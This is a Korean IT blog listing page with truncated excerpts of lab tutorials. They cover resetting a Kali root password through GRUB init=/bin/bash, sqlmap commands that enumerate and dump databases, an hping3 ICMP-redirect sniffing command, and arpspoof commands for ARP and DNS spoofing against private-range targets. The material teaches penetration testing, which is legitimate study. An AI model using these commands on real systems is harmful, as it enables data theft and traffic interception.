Simple is IT, 누구나 보고 누구나 깨닫는 IT

어느날 kali에 접속을 시도했을 때 root 계정으로 로그인이 되지 않았습니다.​이러한 분실 상황에서 암호를 변경하는 법을 다루는 포스팅이 될 것 입니다.​​ 저는 Kali에서 암호 변경을 진행했지만 Ubuntu와 Debian, 다른 버전의 리눅스에서도 많이 사용하는 방법입니다.​​​ 일단 재부팅 시도 후 GRUB 설정환경으로 접속해줍니다. 이 상태에서 e를 누르게 되면​ GRUB editing 화면으로 바뀌게 됩니다.​​linux로 시작하는 줄을 찾은 후ro -> rwquiet splash 제거 -> init=/bin/bash​변경 전 ​변경 후 ​설명을 드리자면, linux의 부팅환경에서 read-only(읽기 전용)를 read-write(읽기, 쓰기)로 바꿔주어서 암호 변경을 할 수 있게 해준 후..

자동화 도구(sqlmap, 하비지 등) SQLmap 설치 : apt-get insatll sqlmap -y sqlmap -u [공격 URL] --dbs //단, 공격 URL은 GET방식 데이터를 전달하는 주소, DBMS 종류 및 DB 이름 알아내기 sqlmap -u [공격 URL] -D [DB명] --tables // 테이블명 알아내기 sqlmap -u [공격 URL] -D [DB명] -T [테이블명] --columns // 테이블의 칼럼명 알아내기 sqlmap -u [공격 URL] -D [DB명] -T [테이블명] -C [칼럼명] --dump // 데이터 알아내기 sqlmap -u [URL] --dbs sqlmap -u 192.168.10.5:9090/board_view.asp?num=1 --dbs D..

ICMP Redirect Sniffing- ICMP Type 5(Redirect)를 이용해 타깃의 라우팅 테이블에 특정 라우팅 정보를 수정 또는 추가 ICMP 헤더 ​ Hacker 192.168.10.6 (Kali Linux) Target 192.168.10.8 (Windows XP) 공격 전 Target의 라우팅 테이블 ​Hacker# apt-get install hping3 -y​hping3의 icmp redirect 옵션 예시-> hping3 -1 --icmptype 5 --icmpcode 1 -a [기존 GW] --icmp-ipdst [Target 목적지] --icmp-gw [목적지의 GW] --icmp-ipsrc [Target] [Target]​명령 WireShark ​​​Target 공격 후 ..

Hacker 192.168.10.6 ( Kali Linux ) Target 192.168.10.8 ( Windows XP ) GW 192.168.10.2 Tool dsniff DNS Spoofing 실행 전 Target ​ arp table ​ web connect ​ ​ ​ ​ ---- Hacker ​ 1. ARP Spoofing - Target의 ARP 테이블에 Gateway MAC을 Hacker MAC으로 스푸핑 -> arpspoof -t 192.168.10.6 192.168.10.2 ​ ​ - Gateway ARP 테이블에 Target MAC을 Hacker MAC으로 스푸핑 -> arpspoof -t 192.168.10.2 192.168.10.6 ​ ​ 2. dns spoof 위한 파일 생성 ->..